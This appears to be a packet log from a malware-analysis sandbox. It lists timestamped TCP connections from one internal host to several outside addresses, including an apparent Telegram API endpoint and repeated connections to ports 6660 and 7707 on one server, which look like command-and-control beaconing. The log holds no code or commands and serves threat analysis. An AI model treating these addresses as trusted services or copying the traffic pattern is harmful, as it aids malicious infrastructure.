Jul 6, 2024 13:29:05.911761045 CEST	80	49936	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:06.040779114 CEST	80	49935	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:06.041086912 CEST	49935	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:06.041842937 CEST	49937	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:06.041879892 CEST	443	49937	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:06.042110920 CEST	49937	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:06.045783043 CEST	49937	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:06.045793056 CEST	443	49937	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:06.047914028 CEST	80	49935	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:06.048053026 CEST	49935	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:06.528816938 CEST	443	49937	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:06.530215979 CEST	49937	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:06.530234098 CEST	443	49937	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:06.621264935 CEST	80	49936	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:06.622536898 CEST	80	49936	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:06.622634888 CEST	49936	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:06.622751951 CEST	49936	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:06.662121058 CEST	443	49937	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:06.662283897 CEST	443	49937	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:06.662347078 CEST	49937	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:06.662559986 CEST	49937	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:06.735979080 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:06.736011982 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:06.736076117 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:06.736440897 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:06.736462116 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:06.737433910 CEST	49939	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:06.742347002 CEST	80	49939	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:06.742420912 CEST	49939	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:06.742455959 CEST	49939	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:06.747395039 CEST	80	49939	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:06.747443914 CEST	49939	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:06.752367020 CEST	80	49939	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:07.002757072 CEST	6660	49934	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:07.002809048 CEST	49934	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:07.366444111 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.366503000 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.368056059 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.368065119 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.368271112 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.369417906 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.369448900 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.507006884 CEST	80	49939	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:07.507323027 CEST	80	49939	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:07.507368088 CEST	49939	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:07.509321928 CEST	49939	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:07.612658978 CEST	49940	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:07.617628098 CEST	80	49940	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:07.617697954 CEST	49940	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:07.617738008 CEST	49940	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:07.622642994 CEST	80	49940	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:07.622685909 CEST	49940	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:07.627471924 CEST	80	49940	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:07.673338890 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674005032 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674045086 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674129009 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674149036 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674161911 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674199104 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674206018 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674213886 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674246073 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674257040 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674293995 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674307108 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674323082 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674334049 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674339056 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674351931 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674408913 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674417019 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674428940 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674439907 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674443960 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674448967 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674452066 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674458027 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674664021 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674673080 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674690008 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674698114 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674700022 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674707890 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674716949 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674721956 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674730062 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674734116 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674815893 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674823046 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674828053 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674843073 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674854994 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674863100 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674877882 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674884081 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674885988 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674894094 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674897909 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.674911976 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.674916983 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.675002098 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.675013065 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.675028086 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.675036907 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.675137043 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.675143957 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.675153971 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.675163984 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.675210953 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.675219059 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.675241947 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.675251961 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.675271988 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.675271988 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.675288916 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686557055 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.686690092 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686702967 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.686716080 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686728954 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686729908 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:07.686736107 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686749935 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686764956 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686764956 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686794996 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686800957 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686852932 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686852932 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686871052 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686885118 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686954975 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686973095 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.686990023 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.687000036 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.687011957 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.687026978 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.687026978 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:07.696120024 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:08.351695061 CEST	80	49940	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:08.352719069 CEST	80	49940	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:08.352900982 CEST	49940	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:08.353465080 CEST	49940	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:08.456366062 CEST	49941	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:08.461453915 CEST	80	49941	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:08.461582899 CEST	49941	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:08.461582899 CEST	49941	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:08.466461897 CEST	80	49941	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:08.467904091 CEST	49941	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:08.473643064 CEST	80	49941	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:08.560606956 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:08.560695887 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:08.560863018 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:08.560914040 CEST	443	49938	149.154.167.220	192.168.2.4
Jul 6, 2024 13:29:08.561012983 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:08.561012983 CEST	49938	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:29:09.211308002 CEST	80	49941	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:09.211818933 CEST	80	49941	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:09.211865902 CEST	49941	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:09.213352919 CEST	49941	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:09.315612078 CEST	49943	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:09.320597887 CEST	80	49943	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:09.320662022 CEST	49943	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:09.320698023 CEST	49943	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:09.325454950 CEST	80	49943	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:09.325532913 CEST	49943	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:09.330348969 CEST	80	49943	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:10.067461014 CEST	80	49943	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:10.068088055 CEST	80	49943	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:10.068563938 CEST	49943	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:10.069291115 CEST	49943	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:10.174954891 CEST	49944	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:10.179856062 CEST	80	49944	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:10.180094004 CEST	49944	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:10.180094004 CEST	49944	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:10.185628891 CEST	80	49944	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:10.185750961 CEST	49944	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:10.190514088 CEST	80	49944	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:11.092449903 CEST	80	49944	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:11.092977047 CEST	80	49944	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:11.093028069 CEST	49944	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:11.094520092 CEST	49944	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:11.206202984 CEST	49945	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:11.211327076 CEST	80	49945	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:11.211390972 CEST	49945	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:11.211433887 CEST	49945	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:11.216284990 CEST	80	49945	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:11.216335058 CEST	49945	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:11.221199036 CEST	80	49945	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:12.020787954 CEST	49934	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:12.023323059 CEST	49946	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:12.025641918 CEST	6660	49934	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:12.028276920 CEST	6660	49946	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:12.028502941 CEST	49946	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:12.028759956 CEST	49946	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:12.035087109 CEST	6660	49946	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:12.040713072 CEST	80	49945	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:12.041779995 CEST	80	49945	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:12.042010069 CEST	49945	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:12.042646885 CEST	49945	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:12.124896049 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:12.133466959 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:12.133583069 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:12.140045881 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:12.143785954 CEST	49947	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:12.148694992 CEST	80	49947	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:12.148825884 CEST	49947	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:12.148825884 CEST	49947	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:12.157774925 CEST	80	49947	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:12.158108950 CEST	49947	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:12.164781094 CEST	80	49947	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:12.455455065 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:12.550205946 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:12.601522923 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:12.619787931 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:12.624723911 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:12.624897957 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:12.629936934 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:13.677035093 CEST	6660	49946	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:13.677129984 CEST	49946	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:16.160640001 CEST	80	49947	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:16.160832882 CEST	80	49947	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:16.161159992 CEST	49947	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:16.162862062 CEST	49947	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:16.271801949 CEST	49949	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:16.276735067 CEST	80	49949	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:16.276870966 CEST	49949	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:16.276870966 CEST	49949	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:16.281727076 CEST	80	49949	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:16.283997059 CEST	49949	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:16.288918018 CEST	80	49949	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:17.007226944 CEST	80	49949	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:17.008382082 CEST	80	49949	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:17.008430958 CEST	49949	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:17.009325981 CEST	49949	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:17.112561941 CEST	49950	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:17.117830038 CEST	80	49950	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:17.117896080 CEST	49950	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:17.117980957 CEST	49950	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:17.122725964 CEST	80	49950	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:17.122773886 CEST	49950	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:17.127568960 CEST	80	49950	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:18.337018013 CEST	80	49950	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:18.337035894 CEST	80	49950	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:18.337095022 CEST	80	49950	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:18.337133884 CEST	49950	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:18.339210987 CEST	49950	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:18.339559078 CEST	49950	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:18.440658092 CEST	49951	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:18.445529938 CEST	80	49951	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:18.447887897 CEST	49951	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:18.447887897 CEST	49951	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:18.453322887 CEST	80	49951	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:18.453773975 CEST	49951	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:18.459162951 CEST	80	49951	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:18.690922976 CEST	49946	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:18.691185951 CEST	49952	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:18.696119070 CEST	6660	49946	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:18.696134090 CEST	6660	49952	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:18.696316004 CEST	49952	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:18.696552038 CEST	49952	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:18.701378107 CEST	6660	49952	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:19.411593914 CEST	80	49951	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:19.411612034 CEST	80	49951	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:19.411668062 CEST	49951	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:19.414071083 CEST	49951	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:19.518948078 CEST	49953	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:19.523843050 CEST	80	49953	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:19.523907900 CEST	49953	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:19.523977041 CEST	49953	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:19.529427052 CEST	80	49953	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:19.529475927 CEST	49953	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:19.535336971 CEST	80	49953	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:20.203171015 CEST	80	49953	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:20.204297066 CEST	80	49953	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:20.204382896 CEST	49953	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:20.205410957 CEST	49953	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:20.325210094 CEST	6660	49952	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:20.325661898 CEST	49952	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:20.356717110 CEST	49954	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:20.361521006 CEST	80	49954	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:20.361651897 CEST	49954	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:20.361651897 CEST	49954	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:20.366455078 CEST	80	49954	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:20.366750956 CEST	49954	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:20.371582031 CEST	80	49954	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:21.131361008 CEST	80	49954	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:21.132553101 CEST	80	49954	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:21.132601023 CEST	49954	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:21.133184910 CEST	49954	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:21.257224083 CEST	49955	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:21.262185097 CEST	80	49955	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:21.262247086 CEST	49955	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:21.262339115 CEST	49955	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:21.267124891 CEST	80	49955	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:21.267172098 CEST	49955	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:21.272118092 CEST	80	49955	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:22.045747995 CEST	80	49955	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:22.046691895 CEST	80	49955	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:22.048011065 CEST	49955	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:22.048135042 CEST	49955	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:22.160298109 CEST	49956	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:22.165975094 CEST	80	49956	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:22.166191101 CEST	49956	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:22.166191101 CEST	49956	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:22.172550917 CEST	80	49956	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:22.174037933 CEST	49956	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:22.181704044 CEST	80	49956	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:23.021195889 CEST	80	49956	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:23.021224022 CEST	80	49956	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:23.021238089 CEST	80	49956	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:23.021277905 CEST	49956	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.021302938 CEST	49956	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.023519993 CEST	49956	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.128161907 CEST	49957	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.136272907 CEST	80	49957	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:23.136338949 CEST	49957	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.136375904 CEST	49957	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.142589092 CEST	80	49957	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:23.142632008 CEST	49957	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.148878098 CEST	80	49957	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:23.831342936 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:23.836252928 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:23.836337090 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:23.841154099 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:23.867224932 CEST	80	49957	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:23.867877960 CEST	80	49957	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:23.868252039 CEST	49957	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.869299889 CEST	49957	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.971983910 CEST	49959	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:23.976969957 CEST	80	49959	188.114.96.3	192.168.2.4
